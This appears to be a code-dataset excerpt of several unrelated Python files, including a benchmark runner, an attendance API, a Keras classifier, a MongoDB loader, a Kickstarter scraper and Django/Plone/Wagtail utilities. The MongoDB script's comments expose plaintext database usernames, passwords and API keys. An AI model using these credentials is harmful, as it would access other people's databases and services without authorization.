'Transfer rate':\n result_ab_fields.append(field._replace(\n value_text='?',\n value=sum_transfer_rate / len(test_results)\n ))\n else:\n result_ab_fields.append(field)\n\n return TestResult(\n commit='?',\n cpu_time='?',\n mem_usage='?',\n worker_time='?',\n ab_fields=result_ab_fields,\n ab_raw='?'\n )\n\n\ndef run_test(ab_args):\n ab_args = tuple(str(a) for a in ab_args)\n\n print('Running AB with arguments: `{}`'\n .format(' '.join(ab_args)))\n out = subprocess.check_output(ab_args).decode('utf-8')\n fields = parse_ab_out(out)\n\n git_out = subprocess.check_output(['git', 'log', '--oneline'],\n universal_newlines=True)\n commit = git_out.splitlines()[0]\n\n return TestResult(commit=commit, ab_fields=fields, ab_raw='?',\n cpu_time='?', mem_usage='?',\n worker_time='?')\n\n\ndef run_tests(*, urls, request_numbers, concurrences, headers=[], body):\n for url in urls:\n concurrencies_results = []\n\n for n, c in zip(request_numbers, concurrences):\n concurrency_results = []\n\n for i in range(TEST_REPETITION):\n if body is not None:\n body_arg = ['-p', body]\n else:\n body_arg = []\n\n headers_args = []\n\n for header in headers:\n headers_args.extend(['-H', *header])\n\n ab_args = ['ab', '-n', n, '-c', c,\n *headers_args, *body_arg, url]\n concurrency_results.append(run_test(ab_args))\n\n concurrency_result_avr = calc_tests_avr(concurrency_results)\n 
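# keep the averaged result for this concurrency level\n            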
concurrencies_results.append(concurrency_result_avr)\n\n print(prettify_test_result(concurrency_result_avr))\n print('---')\n\n sum_time_per_req_mean_total = 0\n\n for result in concurrencies_results:\n time_per_req_mean_total_field = next(filter(\n lambda ab_field: ab_field.value_suffix == ' [ms] (mean, across all concurrent requests)', # noqa\n result.ab_fields\n ))\n\n sum_time_per_req_mean_total += time_per_req_mean_total_field.value\n\n print('Avr time per request (mean, across all concurrent requests):')\n print(sum_time_per_req_mean_total / len(concurrencies_results))\n print('======')\n\n\ndef namedtuple_to_dict(nt):\n # noinspection PyProtectedMember\n dct = nt._asdict()\n\n for key, value in dct.items():\n if hasattr(value, '_asdict'):\n dct[key] = namedtuple_to_dict(value)\n\n return dct\n\n\ndef percent_encode(char):\n return '%' + hex(ord(char))[2:]\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-c',\n help='Space separated list of concurrences to benchmark',\n nargs='+',\n type=int,\n required=True\n )\n parser.add_argument('-u', help='Space separated list of URLs to benchmark',\n nargs='+', required=True)\n parser.add_argument('-n', help='Number of total requests', default=20)\n parser.add_argument('-H', help='Add header, eg. \\'Accept-Encoding: gzip\\' (repeatable)',\n action='append', nargs='*', default=[])\n parser.add_argument('-p', help='File containing body to POST', default=None)\n args = parser.parse_args()\n\n request_numbers = [args.n] * len(args.c)\n run_tests(\n urls=args.u,\n request_numbers=request_numbers,\n concurrences=args.c,\n headers=args.H,\n body=args.p\n )\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"hspasov-web-server/scripts/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":9296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"494638865","text":"from tortoise.transactions import in_transaction\nimport datetime, pytz\nfrom app.utils.validate_response import response_json\nfrom app.utils.sql_helper import sql_update_builder\nfrom dateutil import parser\nfrom app.utils.json import UUIDEncoder\nimport json\nimport uuid\n\ntz = pytz.timezone('Asia/Bangkok')\n\nasync def init_state_check(current_user):\n try:\n dt = datetime.datetime.now(tz)\n async with in_transaction() as conn:\n query = ( \n \" select * from attendance as a where a.attendance_date = $1 and a.users_uuid_id = $2 order by attendance_id DESC limit 2 \"\n )\n rv = await conn.execute_query_dict(\n query,[ dt.date(), current_user[\"users_uuid\"] ]\n )\n if not rv:\n return ({\n \"status\" : \"success\" ,\n \"message\" : { \"attendance_init\" : 0 , \"message\" : \"empty attendance\" } , \n \"status_code\" : 200\n }) \n else:\n if (rv[0]['attendance_type_id'] == 1 ):\n return ({\n \"status\" : \"success\" ,\n \"message\" : { \"attendance_init\" : 1 ,\n \"attendance_date\" : str(rv[0]['attendance_date']) ,\n \"attendance_time\" : str(rv[0]['attendance_time']),\n \"attendance_type_id\" : str(rv[0]['attendance_type_id']),\n \"attendance\" : \"already checkin\"} , \n \"status_code\" : 200\n }) \n if (rv[0]['attendance_type_id'] == 2 ):\n return ({\n \"status\" : \"success\" ,\n \"message\" : { \"attendance_init\" : 2,\n \"attendance_date\" : str(rv[0]['attendance_date']) ,\n \"attendance_details\" : rv,\n \"attendance\" : \"attendance success\"} , \n \"status_code\" : 200\n }) \n \n except Exception as e:\n print(e)\n return ({\n \"status\" : \"Failed\" ,\n \"message\" : { 
\"message\" : \"Failed\" } , \n \"status_code\" : 400\n }) \nasync def insertAttendance(req , current_user):\n try:\n params = req.json\n dt = datetime.datetime.now(tz)\n uuid_entry = str( uuid.uuid4() ) \n async with in_transaction() as conn:\n query = ( \n \" INSERT INTO attendance ( \"\n \" attendance_public_id, attendance_date, attendance_time, attendace_remark, attendance_location, attendance_lat, attendance_long, created, is_active, attendance_method_id, attendance_type_id, users_uuid_id) VALUES \"\n \" ($1 , $2 , $3 , $4 , $5 , $6 ,$7 , $8 ,$9 ,$10 ,$11 ,$12 ) \"\n \" returning attendance_id;\"\n )\n await conn.execute_query(\n query,[ uuid_entry ,dt.date() , dt.time() , params[\"attendance_remark\"], params[\"attendance_location\"] , str(params[\"attendance_lat\"]), str(params[\"attendance_long\"]),dt , True , params[\"attendance_method_id\"] , params[\"attendance_type_id\"] , current_user[\"users_uuid\"] ]\n )\n return ({\n \"status\" : \"Success\" ,\n \"message\" : { \"message\" : \"success\" } , \n \"status_code\" : 201\n }) \n except Exception as e:\n print(e)\n return ({\n \"status\" : \"Failed\" ,\n \"message\" : { \"message\" : \"Failed\" } , \n \"status_code\" : 400\n }) \nasync def FindUsersAttendance(current_user , month ,years):\n try:\n dt = datetime.datetime.now(tz)\n async with in_transaction() as conn:\n query_checkin = ( \n \" select * from attendance as a \"\n \" where DATE_PART('month' ,a.attendance_date) = $1 \"\n \" AND DATE_PART( 'year',a.attendance_date) = $2 and a.users_uuid_id = $3 and a.attendance_type_id = 1 order by attendance_id ASC \"\n )\n rv_checkin = await conn.execute_query_dict(\n query_checkin,[ int(month), int(years) , current_user[\"users_uuid\"] ]\n )\n query_checkout = ( \n \" select * from attendance as a \"\n \" where DATE_PART('month' ,a.attendance_date) = $1 \"\n \" AND DATE_PART( 'year',a.attendance_date) = $2 and a.users_uuid_id = $3 and a.attendance_type_id = 2 order by attendance_id ASC \"\n )\n rv_checkout = await conn.execute_query_dict(\n query_checkout,[ int(month), int(years) , current_user[\"users_uuid\"] ]\n )\n \n \n \n \n \n return ({\n \"status\" : \"success\" ,\n \"message\" : { \"message\" : \"rv\" } , \n \"status_code\" : 200\n }) \n \n except Exception as e:\n print(e)\n return ({\n \"status\" : \"Failed\" ,\n \"message\" : { \"message\" : \"Failed\" } , \n \"status_code\" : 400\n }) \n ","sub_path":"Api/app/api/event/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":5194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"299647540","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport cv2\nfrom keras.datasets import mnist \nfrom keras.models import Model \nfrom keras.layers import Input, Dense \nfrom keras.utils import np_utils \n\nDATADIR = \"/home/den/n/data\"\n\nCATEGORIES = [\"X\", \"V\"]\n\ndata=[]\nclass_list = []\n\n\nfor category in CATEGORIES: \n path = os.path.join(DATADIR,category) \n for img in os.listdir(path): \n img_array = cv2.imread(os.path.join(path,img) ,cv2.IMREAD_GRAYSCALE) \n data.append(img_array)\n class_list.append(category)\n\n\n#print(class_list)\nnum_class_list=[]\n\nfor i in class_list:\n if i=='X':\n num_class_list.append(0)\n if i=='V':\n num_class_list.append(1)\n#print(num_class_list)\n\nnum_class_arr=np.array(num_class_list)\n#print(num_class_arr)\n#print(type(num_class_arr))\ndata_arr=np.array(data)\n#print(type(data_arr))\n#print(len(data_arr))\n#print(data_arr[0])\n\nbatch_size = 15 # 
number of training examples processed at once in one iteration of gradient descent\nnum_epochs = 20 # number of passes of the training algorithm over the whole training set\nhidden_size = 100 # number of neurons in each of the two hidden MLP layers\n\nnum_train = 320\nnum_test = 80\n\nheight, width, depth = 95, 95, 1 \nnum_classes = 2 \n\n\nX_train=data_arr[0:320]\ny_train=num_class_arr[0:320]\n\n\nX_test=data_arr[320:400]\ny_test=num_class_arr[320:400]\n\nprint(len(X_train))\nprint(X_train[0])\n\nX_train = X_train.reshape(num_train, height * width) \nX_test = X_test.reshape(num_test, height * width) \n\nX_train = X_train.astype('float32') \nX_test = X_test.astype('float32')\nX_train /= 255 \nX_test /= 255 \n\nY_train = np_utils.to_categorical(y_train, num_classes) \nY_test = np_utils.to_categorical(y_test, num_classes) \n\ninp = Input(shape=(height * width,)) \nhidden_1 = Dense(hidden_size, activation='relu')(inp) # First hidden ReLU layer\nhidden_2 = Dense(hidden_size, activation='relu')(hidden_1) # Second hidden ReLU layer\nout = Dense(num_classes, activation='softmax')(hidden_2) # Output softmax layer\n\nmodel = Model(input=inp, output=out) \n\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) \n\nmodel.fit(X_train, Y_train,batch_size=batch_size, nb_epoch=num_epochs) \n\n\n\n","sub_path":"lw4/lab-work/many.py","file_name":"many.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"63638118","text":"#!/usr/bin/env python\n#coding:utf-8\n#author:jun.yan@majorbio.com\n#last_modified:20170206\n\nimport re\nimport commands\n\ndef get_line_num(file):\n\tline_num = 0\n\twith open(file,'r') as file_r:\n\t\tfor line in file_r.readlines():\n\t\t\tif re.search(r'.+?\\n',line) and not re.search(r'ccession',line):\n\t\t\t\tline_num = line_num+1\n\treturn line_num\n\t\nfile_inf = commands.getoutput('''for i in *.DE.list;do echo \"${i%%.*}\"* ;done''')\nfile_list = file_inf.split('\\n')\n\nwith open('all_diff_up_down.xls','a')as file_each_a:\n\tfile_each_a.write(\"name\\tall_num\\tdiff_num\\tup_num\\tdown_num\\n\")\nfor file in file_list:\n\tfile_each_name = re.search(r'(.*?)\\.',file).group(1)\n\tall = diff = up = down = 0\n\tfile = file.strip('\\n')\n\tfile_detail = file.split(' ')\n\tfor file_each in file_detail:\n\t\tif re.search('diff\\.exp\\.xls$',file_each):\n\t\t#\tprint(file_each)\n\t\t\tall = get_line_num(file_each)\n\t\tif re.search('DE',file_each):\n\t\t\tdiff = diff+get_line_num(file_each)\n\t\tif re.search('up',file_each):\n\t\t\tup = up+get_line_num(file_each)\n\t\tif re.search('down',file_each):\n\t\t\tdown = down+get_line_num(file_each)\n\twith open('all_diff_up_down.xls','a')as file_each_a:\n\t\tfile_each_a.write(file_each_name+'\\t'+str(all)+'\\t'+str(diff)+'\\t'+str(up)+'\\t'+str(down)+'\\n')\n","sub_path":"get_diff_up_down.py","file_name":"get_diff_up_down.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"169262410","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('eds', '0005_auto_20150709_1608'),\n    ]\n\n    operations = [\n        migrations.AlterModelOptions(\n            name='eds',\n            options={'ordering': ['idOilCompany'], 'verbose_name_plural': 'Estaciones de servicio'},\n        ),\n        
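# the remaining operations adjust ordering and labels for the product models\n        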
migrations.AlterModelOptions(\n name='edsproduct',\n options={'ordering': ['idProduct__name'], 'verbose_name_plural': 'Productos y estaciones'},\n ),\n migrations.AlterModelOptions(\n name='product',\n options={'ordering': ['idProject'], 'verbose_name_plural': 'Productos'},\n ),\n migrations.AlterField(\n model_name='edsproduct',\n name='idProduct',\n field=models.ForeignKey(verbose_name=b'Producto', to='eds.Product'),\n ),\n ]\n","sub_path":"ctrleds/apps/eds/migrations/0006_auto_20150709_2042.py","file_name":"0006_auto_20150709_2042.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"276422018","text":"from pymongo import MongoClient\n# from pymongo import InsertOne\nimport datetime\nimport json \nimport pandas as pd\nimport requests \nimport pymongo\n\n\n# import motor.motor_tornado as mt\n# Client = MongoClient(\"mongodb://admin:admin123@ds213715.mlab.com:13715/movapp\",connect=False, serverSelectionTimeoutMS=30000)\n# Client = MongoClient(\"mongodb://anas:anas123@ds247171.mlab.com:47171/qstapp\" , connectTimeoutMS = 30000)\nClient = MongoClient()\n\n\n# Client = MongoClient(\"mongodb://admin:Mohammed.021995@SG-RecSys-18047.servers.mongodirector.com:47456,SG-RecSys-18048.servers.mongodirector.com:47456,SG-RecSys-18049.servers.mongodirector.com:47456/admin?replicaSet=RS-RecSys-0&ssl=true\")\n# Client =MongoClient(\"mongodb://admin:bigdata5@ds247171.mlab.com:47171/qstapp\")\n# db = Client.get_database('movie_rec')\n\n# db = Client['qstapp']\n\ndb = Client.get_database('app_db')\ndb_movies = db.movies\ndb_users = db.users\ndb_ratings = db.ratings\n\n# count = db.rows.count_documents({})\n\n# db_test.insert_one({'i': \"kjdsfsdfjsdlkfn\"})\n# movies = pd.read_csv('movies.dat', sep='::', names=['movie_id','movie_name','movie_tags'])\n# links = pd.read_csv('links.csv', sep=',',dtype=str)\n# links.columns = [\"movie_id\",\"imdbId\",\"tmdbId\"]\n# links.movie_id.apply(int)\n\n# links[\"movie_id\"] = links[\"movie_id\"].astype(int)\n# users = pd.read_csv('users.dat', sep='::', names=['user_id','gender','age','occupation','zip_code'])\n# ratings = pd.read_csv('ratings.dat', sep='::', names=['user_id','movie_id','rating','timestamp'])\n\n\n# n = 3892\n# keys = [\"7db8c464\",\"7db8c464\",\"856db772\",\"25550120\"]\n\n# keys = [\"4b7932ba\",\"ca9c5b\",\"f8a0ad6e\",\"7b7f806c\"]\n\n# keys = [\"3635a730\",\"ca9c5b\",\"f8a0ad6e\",\"7b7f806c\"]\n\n# def get_data(key,movie):\n\n\n# URL = \"http://www.omdbapi.com/\"\n\n# PARAMS = {'i':movie,'apikey':key} \n \n# r = requests.get(url = URL, params = PARAMS) \n# data = r.json() \n# return data\n\n\n# result = pd.merge(movies, links, on='movie_id')\n\n\n# for index, row in result.iterrows():\n\n# if index > -1 : \n# movie = row['movie_name'][:-6].strip()\n# year = row['movie_name'][-5:-1]\n# tags = row['movie_tags'].split(\"|\")\n\n# data = get_data(keys[int(index/(n/4))],\"tt\"+row['imdbId'])\n# # data = {}\n\n# tt = {\"movie_id\":row['movie_id'],\"imdbId\":row['imdbId'],\"movie_name\": movie, \"year\":year,\"tags\":tags, \"data\": data}\n# if not (db_movies.update(tt, tt, upsert = True)['updatedExisting']):\n# print(index,\"insert || \",tt['movie_name'],'||' ,row['movie_name'])\n# else:\n# print(index,\"update || \",tt['movie_name'])\n\ndijob = {0: \"other\" ,\n\t 1: \"academic/educator\",\n\t 2: \"artist\",\n\t 3: \"clerical/admin\",\n\t 4: \"college/grad student\",\n\t 5: \"customer service\",\n\t 6: \"doctor/health care\",\n\t 7: \"executive/managerial\",\n\t 
8: \"farmer\",\n\t 9: \"homemaker\",\n\t 10: \"K-12 student\",\n\t 11: \"lawyer\",\n\t 12: \"programmer\",\n\t 13: \"retired\",\n\t 14: \"sales/marketing\",\n\t 15: \"scientist\",\n\t 16: \"self-employed\",\n\t 17: \"technician/engineer\",\n\t 18: \"tradesman/craftsman\",\n\t 19: \"unemployed\",\n\t 20: \"writer\"}\n\n\nfor doc in db_users.find():\n myquery = doc\n newvalues = { \"$set\": { \"work\": dijob[doc[\"occupation\"]] } }\n\n print(db_users.update_one(myquery, newvalues))\n# # print(movies.head())\n# # print(\"start\")\n# # client_db.movies.insert(json.loads(movies.T.to_json()).values())\n# # print(\"movies done\")\n# # client_db.users.insert(json.loads(users.T.to_json()).values())\n# # print(\"users done\")\n# # client_db.ratings.insert(json.loads(ratings.T.to_json()).values())\n# # print(\"ratings done\")\n\n\n# # cursor_excess_new = (\n# # crows.find() \n# # .sort([(\"_id\", 1)])\n# # )\n\n# # queries = [InsertOne(doc) for doc in cursor_excess_new]\n# # srows.bulk_write(queries)\n","sub_path":"transfer.py","file_name":"transfer.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"391224509","text":"import requests\nfrom geopy.geocoders import Nominatim\nfrom geopy.point import Point\n# from geopy.geocoders import GoogleV3\nfrom currency_converter import CurrencyConverter\nfrom datetime import datetime, timedelta\nfrom .models import DB, Project\nfrom bs4 import BeautifulSoup\nimport re\n\n\n# DB = models.DB\n\ndef add_new_project(url):\n \"\"\"\n Requests data from a html page\n :param url:\n :return:\n \"\"\"\n try:\n slug = re.search('/projects/(.*)\\?', url).group(1)\n\n session = requests.Session()\n request = session.get(url)\n soup = BeautifulSoup(request.text, 'html.parser')\n xcsrf = soup.find(\"meta\", {\"name\": \"csrf-token\"})[\"content\"]\n\n query = \"\"\"\n query Campaign($slug: String!) 
{\n project(slug: $slug) {\n id \n name\n category {\n name\n parentCategory {\n name\n }\n }\n location {\n displayableName \n }\n goal {\n currency\n amount\n }\n deadlineAt\n duration\n state\n description\n __typename\n }\n }\"\"\"\n\n r = session.post(\"https://www.kickstarter.com/graph\",\n headers={\n \"x-csrf-token\": xcsrf\n },\n json={\n \"query\": query,\n \"variables\": {\n \"slug\": slug\n }\n })\n\n result = r.json()['data']['project']\n\n # get parameters from the data\n id = result['id']\n name = result['name']\n category = result['category']['name'].lower()\n parent_category = result['category']['parentCategory']['name'].lower()\n category_slug = parent_category + \"/\" + category\n town, country_code = town_country(result['location']['displayableName'])\n goal_amount = to_usd(result['goal']['amount'], result['goal']['currency'])\n deadline_at = datetime.fromtimestamp(result['deadlineAt'])\n launched_at = when_launched(result['duration'], result['deadlineAt'])\n description = result['description']\n\n # add new project to the database\n db_project = Project(id=id, name=name, category_name=category,\n category_slug=category_slug, goal_amount=goal_amount,\n description=description, launched_at=launched_at,\n deadline_at=deadline_at, country_code=country_code,\n town=town)\n DB.session.add(db_project)\n\n except Exception as e:\n print(\"Error processing {}: {}\".format(url, e))\n raise e\n\n else:\n # return result['location']['displayableName']\n DB.session.commit()\n\n\ndef to_usd(amount, currency):\n \"\"\"Convert a sum of money into US dollars.\n :param amount: amount of money (int or float)\n :param currency: ISO currency code such as 'GBP' (str)\n :return: amount in USD (float)\n \"\"\"\n c = CurrencyConverter(fallback_on_missing_rate=True, fallback_on_wrong_date=True)\n dollar = c.convert(amount, currency, 'USD', date=datetime.today())\n return dollar\n\n\ndef when_launched(duration, deadline):\n \"\"\"Calculate launchedAt based on the deadline and duration\n :param duration: duration in days (int)\n :param deadline: deadline as a unix timestamp (int)\n :return: launchedAt (datetime)\n \"\"\"\n duration = timedelta(days=duration)\n deadline = datetime.fromtimestamp(deadline)\n launched_at = deadline - duration\n return launched_at\n\n\ndef town_country(location):\n \"\"\"Resolve a displayable location name to ('town, country', country code).\n :param location: free-form location string\n :return: tuple of 'town, country' (str) and upper-cased country code (str)\n \"\"\"\n geolocator = Nominatim(user_agent=\"flask_app\")\n address, (latitude, longitude) = geolocator.geocode(location, language=\"en\")\n location = geolocator.reverse((latitude, longitude), language=\"en\")\n if 'city' in location.raw['address']:\n country = location.raw['address']['city'] + ', ' + location.raw['address']['country']\n else:\n country = location.raw['address']['hamlet'] + ', ' + location.raw['address']['country']\n country_code = location.raw['address']['country_code'].upper()\n return country, country_code\n # return location.raw['address']\n\n\n\nif __name__ == '__main__':\n pass\n\n","sub_path":"flask_app/kickstarter.py","file_name":"kickstarter.py","file_ext":"py","file_size_in_byte":4384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"285003741","text":"import warnings\n\nfrom django.test import TestCase\n\nfrom wagtail.wagtailsearch import indexed\nfrom wagtail.tests import models\nfrom wagtail.tests.utils import WagtailTestUtils\n\n\nclass TestContentTypeNames(TestCase):\n def test_base_content_type_name(self):\n name = models.SearchTestChild.indexed_get_toplevel_content_type()\n self.assertEqual(name, 'tests_searchtest')\n\n def test_qualified_content_type_name(self):\n 
name = models.SearchTestChild.indexed_get_content_type()\n self.assertEqual(name, 'tests_searchtest_tests_searchtestchild')\n\n\nclass TestIndexedFieldsBackwardsCompatibility(TestCase, WagtailTestUtils):\n def test_indexed_fields_backwards_compatibility(self):\n # Get search fields\n with self.ignore_deprecation_warnings():\n search_fields = models.SearchTestOldConfig.get_search_fields()\n\n search_fields_dict = dict(\n ((field.field_name, type(field)), field)\n for field in search_fields\n )\n\n # Check that the fields were found\n self.assertEqual(len(search_fields_dict), 2)\n self.assertIn(('title', indexed.SearchField), search_fields_dict.keys())\n self.assertIn(('live', indexed.FilterField), search_fields_dict.keys())\n\n # Check that the title field has the correct settings\n self.assertTrue(search_fields_dict[('title', indexed.SearchField)].partial_match)\n self.assertEqual(search_fields_dict[('title', indexed.SearchField)].boost, 100)\n\n def test_indexed_fields_backwards_compatibility_list(self):\n # Get search fields\n with self.ignore_deprecation_warnings():\n search_fields = models.SearchTestOldConfigList.get_search_fields()\n\n search_fields_dict = dict(\n ((field.field_name, type(field)), field)\n for field in search_fields\n )\n\n # Check that the fields were found\n self.assertEqual(len(search_fields_dict), 2)\n self.assertIn(('title', indexed.SearchField), search_fields_dict.keys())\n self.assertIn(('content', indexed.SearchField), search_fields_dict.keys())\n","sub_path":"wagtail/wagtailsearch/tests/test_indexed_class.py","file_name":"test_indexed_class.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"640717756","text":"# -*- coding: utf-8 -*-\nfrom Products.CMFCore.utils import getToolByName\nfrom plone.app.contenttypes.utils import DEFAULT_TYPES\nfrom plone.dexterity.interfaces import IDexterityFTI\nfrom zope.component import queryUtility\nimport logging\nlogger = logging.getLogger(name=\"plone.app.contenttypes upgrade\")\n\n\ndef update_fti(context):\n \"\"\" Schema-files moved into their own folder after 1.0b1\n \"\"\"\n # Document\n fti = queryUtility(\n IDexterityFTI,\n name='Document'\n )\n fti.model_file = \"plone.app.contenttypes.schema:document.xml\"\n # File\n fti = queryUtility(\n IDexterityFTI,\n name='File'\n )\n fti.model_file = \"plone.app.contenttypes.schema:file.xml\"\n # Folder\n fti = queryUtility(\n IDexterityFTI,\n name='Folder'\n )\n fti.model_file = \"plone.app.contenttypes.schema:folder.xml\"\n # Image\n fti = queryUtility(\n IDexterityFTI,\n name='Image'\n )\n fti.model_file = \"plone.app.contenttypes.schema:image.xml\"\n # Link\n fti = queryUtility(\n IDexterityFTI,\n name='Link'\n )\n fti.model_file = \"plone.app.contenttypes.schema:link.xml\"\n # News Item\n fti = queryUtility(\n IDexterityFTI,\n name='News Item'\n )\n fti.model_file = \"plone.app.contenttypes.schema:news_item.xml\"\n\n\ndef enable_collection_behavior(context):\n \"\"\"Enable collection behavior on Collection.\"\"\"\n\n fti = queryUtility(\n IDexterityFTI,\n name='Collection'\n )\n behavior = 'plone.app.contenttypes.behaviors.collection.ICollection'\n if behavior in fti.behaviors:\n return\n behaviors = list(fti.behaviors)\n behaviors.append(behavior)\n behaviors = tuple(behaviors)\n fti._updateProperty('behaviors', behaviors)\n\n\ndef migrate_to_richtext(context):\n \"\"\"Update fti's to add RichText behaviors and remove old text-fields.\"\"\"\n\n behavior = 
\"plone.app.contenttypes.behaviors.richtext.IRichText\"\n types = [\n \"Document\",\n \"News Item\",\n \"Event\",\n \"Collection\",\n ]\n for type_name in types:\n fti = queryUtility(\n IDexterityFTI,\n name=type_name\n )\n if not fti:\n continue\n if behavior in fti.behaviors:\n continue\n behaviors = list(fti.behaviors)\n behaviors.append(behavior)\n fti._updateProperty('behaviors', tuple(behaviors))\n\n\ndef migrate_album_view(context):\n \"\"\"Migrate atct_album_view to album_view.\"\"\"\n\n # TODO: Don't reload the profile. Only change the settings.\n context.runImportStepFromProfile(\n 'profile-plone.app.contenttypes:default',\n 'typeinfo',\n )\n catalog = getToolByName(context, 'portal_catalog')\n search = catalog.unrestrictedSearchResults\n for brain in search(portal_type='Folder'):\n obj = brain.getObject()\n current = context.getLayout()\n if current == 'atct_album_view':\n obj.setLayout('album_view')\n\n\ndef enable_shortname_behavior(context):\n \"\"\"Add IShortName to all types.\"\"\"\n\n behavior = 'plone.app.dexterity.behaviors.id.IShortName'\n for type_id in DEFAULT_TYPES:\n fti = queryUtility(\n IDexterityFTI,\n name=type_id\n )\n if fti is None:\n continue\n\n if behavior in fti.behaviors:\n continue\n behaviors = list(fti.behaviors)\n behaviors.append(behavior)\n behaviors = tuple(behaviors)\n fti._updateProperty('behaviors', behaviors)\n\n\ndef use_new_view_names(context):\n \"\"\"Migrate old view names to new view names.\"\"\"\n\n # TODO: Don't reload the profile. Only change the settings.\n context.runImportStepFromProfile(\n 'profile-plone.app.contenttypes:default',\n 'typeinfo',\n )\n catalog = getToolByName(context, 'portal_catalog')\n search = catalog.unrestrictedSearchResults\n\n def _fixup(portal_type, view_map):\n for brain in search(portal_type=portal_type):\n obj = brain.getObject()\n current = context.getLayout()\n if current in view_map.keys():\n obj.setLayout(view_map[current])\n logger.info(\"Set view to {} for {}\".format(\n view_map[current], obj.absolute_url()\n ))\n\n folder_view_map = { # OLD : NEW\n 'folder_listing': 'listing_view',\n 'folder_full_view': 'full_view',\n 'folder_summary_view': 'summary_view',\n 'folder_tabular_view': 'tabular_view',\n 'folder_album_view': 'album_view',\n 'atct_album_view': 'album_view',\n }\n collection_view_map = { # OLD : NEW\n 'view': 'listing_view',\n 'standard_view': 'listing_view',\n 'collection_view': 'listing_view',\n 'all_content': 'full_view',\n 'thumbnail_view': 'album_view',\n }\n _fixup('Folder', folder_view_map)\n _fixup('Plone Site', folder_view_map)\n _fixup('Collection', collection_view_map)\n","sub_path":"buildout-cache--/eggs/plone.app.contenttypes-1.2a9-py2.7.egg/plone/app/contenttypes/upgrades.py","file_name":"upgrades.py","file_ext":"py","file_size_in_byte":4930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"91935594","text":"import time\n\n__author__ = 'Arthur Fortes'\n\nimport os\nimport random\nimport operator\n\n\n'''\nGiven a set of data, this function is responsible for creating a set of training and testing.\n\nStandard file for reading:\n\nuser /t item /t information /n\n\nExample:\n\ndir = '/home/user/Documents/base/'\n\ncreate_set('user_artists.dat',\n 'test.dat',\n 'train.dat',\n directory)\n\n\nBy default algorithm divides the base into 80% for training and 20% for testing.\nTo change, simply set the percentage for the test variable \"test_ratio\".\n'''\n\n\ndef default_split(data, directory1, cross_fold=1, test_ratio=0.2):\n\n 
def default_split(data, directory1, cross_fold=1, test_ratio=0.2):\n\n global train_set, test_set\n starting_point = time.time()\n\n print(\"Splitting database: \\n Train: \" + str((1-test_ratio)*100) + \"% \\n Test: \" + str(test_ratio*100) +\n \"% \\n Folds: \" + str(cross_fold))\n\n for fold in range(cross_fold):\n\n list_rank = list()\n new_dir = directory1 + str(fold)\n\n if not os.path.exists(new_dir):\n os.mkdir(new_dir)\n\n with open(data) as infile:\n for line in infile:\n line_file = line.split()\n if line.strip():\n list_rank.append((int(line_file[0]), int(line_file[1]), float(line_file[2])))\n\n start = int(len(list_rank) * test_ratio)\n list_test_users = 1\n list_train_users = 2\n count = 0\n\n while list_test_users != list_train_users:\n count += 1\n list_train_users = list()\n list_test_users = list()\n random.shuffle(list_rank)\n\n test_set = list_rank[-start:]\n test_set = sorted(test_set, key=operator.itemgetter(0, 1))\n [list_test_users.append(user[0]) for user in test_set]\n list_test_users = sorted(list(set(list_test_users)))\n\n train_set = list_rank[:-start]\n train_set = sorted(train_set, key=operator.itemgetter(0, 1))\n [list_train_users.append(user[0]) for user in train_set] # was test_set: resample until train and test cover the same users\n list_train_users = sorted(list(set(list_train_users)))\n\n file_train1 = new_dir + '\\\\train.dat'\n with open(file_train1, 'w') as infile2:\n for user in train_set:\n infile2.write('%s\\t%s\\t%s\\n' % (user[0], user[1], user[2]))\n\n file_test1 = new_dir + '\\\\test.dat'\n with open(file_test1, 'w') as infile:\n for user in test_set:\n infile.write('%s\\t%s\\t%s\\n' % (user[0], user[1], user[2]))\n\n elapsed_time = time.time() - starting_point\n\n print(\"Runtime: \" + str(elapsed_time / 60) + \" minute(s)\")\n\n print(\"Split complete\")\n","sub_path":"split_base/default_split.py","file_name":"default_split.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
